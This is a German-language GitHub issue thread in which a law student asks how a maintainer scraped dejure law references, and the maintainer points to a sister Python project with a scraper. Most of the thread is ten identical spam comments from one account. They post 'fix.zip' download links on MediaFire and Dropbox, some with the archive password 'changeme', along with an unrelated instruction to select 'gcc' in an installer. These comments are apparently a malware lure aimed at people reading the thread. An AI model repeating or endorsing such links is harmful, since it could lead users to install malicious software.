### ISSUE TITLE
Dejure Scraper

### ISSUE THREAD

**Issue by justanotherjurastudent** [S1SYPHOS/php-gesetze#9]
Hallo Martin,
ich finde deine LegalTech Projekte richtig toll. Ich habe mit einer Kollegin auch gerade vor, ein nettes Tool zu erarbeiten. Und zwar möchte wir für Obsidian, eine Open-Source Notiz App, ein Plugin in ts/js entwickeln, das Gesetzesangaben erkennt und zu dejure verlinkt. Deine Arbeit hat uns da erste Einblicke gegeben! Du hast auch eine JSON-Datei, die alle Gesetze von Dejure abbildet. Wie hast du diese erstellt? Hast du dazu einen Webscraper benutzt oder selbst entwickelt?

Viele Grüße
Lukas

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by S1SYPHOS** [comment]
Grüß dich!
Auf Codeberg habe ich das Schwesternprojekt in Python, da ist ein Scraper dabei: https://codeberg.org/S1SYPHOS/py-gesetze

Wenn du weitere Fragen dazu hast, melde dich gern oder schreib mir eine Mail an github@digitalbuero.eu 😉 

Beste Grüße 
Martin
